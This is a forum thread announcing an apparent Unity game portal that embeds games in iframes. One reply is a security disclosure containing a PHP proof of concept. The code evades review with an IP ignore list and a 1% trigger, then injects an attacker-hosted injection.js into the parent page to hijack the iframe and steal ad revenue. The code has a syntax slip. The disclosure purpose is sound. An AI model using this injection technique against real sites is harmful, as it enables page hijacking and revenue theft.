Kuroato Media would like to Present U3DGP.com, short for “Unity 3D Game Portal”
We would like to offer you (Developers and Publishers) this opportunity to Submit your Game while we are in the Work in Progress Stage of Building this Dedicated Unity 3D Web Game Portal.
The Goal is the provide the Best Browser-based Unity 3D Game this Community has to Offer. Also, give you are opputinity to Earn 100% Revenue from your Google Adsense.
We do Not, and will Not Ask you to include any kind of Plugin / Splash Screen / Logo of any sort into your Unity 3D Game! You can Submit your Game as is…
Please note there are 3 simple Requirements for Getting your Game Hosted on U3DGP.com, just go on over and visit the website now and click on “Submit Game” to see the Requirements and Email Address to Send your Game!
With your Support we can make this Website the Number #1 Unity 3D Web Game Portal on Internet.
well all games submitted will be monitored, so that is easily fixed by removing the game that has an iframe breakout or redirection, SIMPLE! = )
this iFrame method is not about saving Bandwidth but about allowing developers full control of their game and revenue stream. As most Game Portals place many restrictions, and rules on how you are able to post your game to their Website, and also steal lots of the revenue through there so called Revenue Sharing Programs.
So no worries… this will and does work, as I have proof of it… = )
First of all, I know this is not the place for security talk, but I think this needs to be addressed before people put their trust in to your service.
Here is some example code for you, this is just one of many ways to do this sort of attacks.
And “fixed by removing the game” is not security. It’s like saying “We will encrypt our passwords when some one finds the database”. The damage have already been done.
The page you send in looks like this:
<?php
if(!empty($_GET["site"]))
{
// preg_match the sites html for the unity webfile.
// Load in that file here:
include_once("GetExternalUnityWebPlayer.php");
}
else
{
// Load in our own game, since the visitor is visiting our own game!
include_once("OurOwnUnityGame.php");
}
// This array should be filled from a database with the first ~100 visitors IPaddress.
// Since the first 100 will include the pages devs (while verifying the page).
$ignoreIPArray = array();
// If random is 1 (1% chance) and the IP is not in our blacklist, inject our script.
if(rand(0,100) == 1 !in_array($_SERVER['REMOTE_ADDR'], $ignoreIPArray))
{
$url = "http://" . $_SERVER["SERVER_NAME"].":".$_SERVER["SERVER_PORT"]. dirname($_SERVER["SCRIPT_NAME"]);
echo <<<EOF
<script>
parent.$("body").append("<script src='{$url}/injection.js'><\/script>");
</script>
EOF;
}
?>
Also host this script on your server under the name “injection.js”:
Change the MyPage variable to your (the attackers) page.
This is super simple code that inject the main page with a javascript that will change the Iframe to always route via my page. Allowing me to take all advertisement for games played after mine.
This is just one of many ways to do this sort of things, even with sandbox mode (new in HTML and Chrome) you are not safe from cross site attacks.
There is a good talk about iframe security from Defcon a few years back that talks about how malware developers abused and hide their code inside normal iframe advertisements.
Hope you understand the security flaw in your design now.
Hang on, so… if I get 100% of the Adsense revenue on my game, then where do you make your money? I don’t want to submit anything to a portal that’s going to go bust in a few weeks.